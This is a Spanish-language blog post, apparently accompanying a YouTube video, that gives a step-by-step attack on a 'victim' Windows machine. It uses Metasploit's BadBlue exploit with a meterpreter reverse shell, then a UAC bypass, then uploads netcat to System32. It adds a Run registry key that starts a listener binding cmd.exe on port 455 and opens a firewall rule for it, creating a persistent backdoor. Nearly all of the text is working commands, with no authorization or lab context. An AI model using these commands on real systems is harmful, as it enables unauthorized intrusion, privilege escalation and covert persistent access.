Como bien prometido tenemos y aunque se dejo por un tiempo de hacer vídeos para el canal de youtube hoy volvemos con un vídeo peculiar en este caso se va a volver a hablar de la persistencia a una maquina victima utilizando netcat una herramienta que permite a través de intérprete de comando y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST, asociar una shell a un puerto en concreto y forzar conexiones UDP/TCP.



En este caso también vamos a aprender a utilizar una vulnerabilidad de Badblue el cual es un programa de intercambio de archivos desde una perspectiva diferente capaz de transformar la máquina en un servidor Web.

Como en el vídeo lo demuestra dejare a continuación los comando que se utilizaran en el vídeo.

   Abrimos la consola de metasploit con el comando msfconsole 

Y utilizamos el siguiente modulo 
   use exploit/windows/http/badblue_passthru

 Ingresamos el payload
set payload windows/meterpreter/reverse_tcp
Configuramos los parámetros requeridos con el rhost y el lhost y ejecutamos con exploit. Luego cuando ya tengamos nuestra sesión de meterpreter abierta. Damos con el comando background para guardar nuestra sesion ya que tendremos que utilizar un modulo de bypassuac para obtener nuestros privilegios como administrador en el sistema de la victima.

 use exploit/windows/local/bypassuac
Y completamos los parámetros en este caso solo nos solicitara la sesión que teníamos guardado anteriormente. Con el comando set session 1 (Numero de la sesion guardada). Y le damos exploit.

Ahora vamos vamos a subir nuestro netcat a la maquina de la victima, vamos a hacerlo en la carpeta system32 el cual nos permitirá llamar en programa de cualquier ruta del sistema. Digitamos en la terminal el comando execute -f cmd -i  para llamar la shel de windows. Y luego con el comando

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
Luego de realizar la subida de netcat, ahora vamos a modificar los registros de windows para que nuestro programa se ejecute al iniciar la maquina de la victima.

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe .Ldp 455 -e cmd.exe'
Y con el siguiente comando verificamos si todo esta de forma correcta

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
Ahora para finalizar debemos abrir los puertos de la maquina de la victima con el siguiente comando.

netsh advfirewall firewall add rule name="el nombre del programa" dir=in action=allow protocol=tcp localport=455

Luego de que la maquina victima reinicie van a poder tener una shell con netcat con el siguiente comando.

nc -v (ip victima) 455
VÍDEO